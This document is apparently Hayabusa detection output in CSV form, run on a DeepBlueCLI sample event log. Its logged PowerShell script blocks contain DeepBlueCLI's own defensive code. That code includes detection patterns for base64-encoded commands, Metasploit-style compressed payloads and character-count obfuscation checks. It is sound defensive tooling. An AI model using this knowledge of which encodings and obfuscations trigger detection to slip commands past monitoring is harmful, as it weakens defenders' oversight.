\-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.977 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.985 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:01:22.441 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:01:22.442 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:01:22.443 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext 